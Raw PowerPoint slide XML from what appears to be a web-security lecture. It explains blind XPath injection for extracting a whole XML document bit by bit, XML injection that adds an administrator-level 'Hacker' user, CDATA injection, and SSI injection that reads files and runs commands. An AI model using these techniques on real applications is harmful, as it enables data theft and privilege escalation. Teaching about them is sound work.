              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>enumerate over sub-nodes, but it is impossible to directly retrieve the node type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>However, there’s a simple work around, which involved some bookkeeping.</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3311474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Now, the trick is to maintain at all times the current number of nodes from each type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>encountered so far. This enables us to know what index from each type is a candidate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>for the next node. We therefore have up to 4 candidates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>find out how many sub-nodes are expected from each type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the next sub-node (number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>k</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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>+1) is indeed the next text sub-node (number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">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+1), then the two node -sets that are united are in fact the same node-set, which</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>contains exactly one node. However, if the next sub-node is not a text sub-node, then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the union will produce two nodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A true value indicates that the next sub-node is a text sub-node, and a false value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>indicates that it is not.</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117213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this example a new user (Hacker) will be inserted into the table with user ID 0. In many cases with XML applications, the second user ID instance will override the first. This results in the injected new user 'Hacker' being logged in with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=0 (which often is used as the administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>uid</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Another type of XML injection is where CDATA elements are used to insert malicious content. One example of this is where XML message payloads that contain a CDATA field can be used to inject illegal characters/content that are ignored by the XML parser.</a:t>
            </a:r>
          </a:p>
          <a:p>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2255771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order to process an element sub-node, a recursion is needed (we implemented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DFS). The procedure we describe here is thus called with the path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>()[position()= N]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>And a processing instruction sub-node has a name:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>name(path/child::node()[position()=N]), and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>()[position()=N]</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3284010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use –Q (instead of Q) if it is negative, and proceed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>also assuming we already know the most significant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>N bi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Thus we can reconstruct a positive Q with 31 Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>queriests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (of the 31 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>we prepare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strings of length </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. The </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th string is a list of bits in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>position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of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>symbols.Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> us designate the </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th string as CN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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36</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310844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we must exclude the double quote mark from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, or else the XPath syntax will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>be broken. Thus we are able to extract string queries using Boolean queries.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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37</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94453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Therefore, the application logs in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>successfully if E is true, and rejects the login attempt if E is false. We now have a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mechanism that extracts a single bit from the system – the Boolean XPath expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>E. As we saw above, this suffices to extract the entire underlying XML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT"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is interesting to note that there are very few variants of the above injection that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cover most of the possible injection “space”. Specifically, it does not require (in most</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cases) knowing exactly the structure of the XPath query. Therein lies the strength of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the blind XPath Injection attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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38</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2411231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an error has</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>occurred, then it’s likely that an XPath Injection is possible.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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39</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574114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Server-Side Includes are directives that the web server parses before serving the page to the user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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41</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1625552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Putting an SSI directive in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a static HTML document is as easy as writing a piece of code like the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT"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if the web server's SSI support is enabled, the server will parse these directives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT"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in every bad input validation situation, problems arise when the user of a web application is allowed to provide data that makes the application or the web server behave in an unforeseen manner. With regard to SSI injection, the attacker could provide input that, if inserted by the application (or maybe directly by the server) into a dynamically generated page, would be parsed as one or more SSI directives.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 vulnerability very similar to a classical scripting language injection vulnerability. One mitigation is that the web server needs to be configured to allow SSI. On the other hand, SSI injection vulnerabilities are often simpler to exploit, since SSI directives are easy to understand and, at the same time, quite powerful, e.g., they can output the content of files and execute system commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="1200" b="0" i="0" kern="1200" dirty="0">
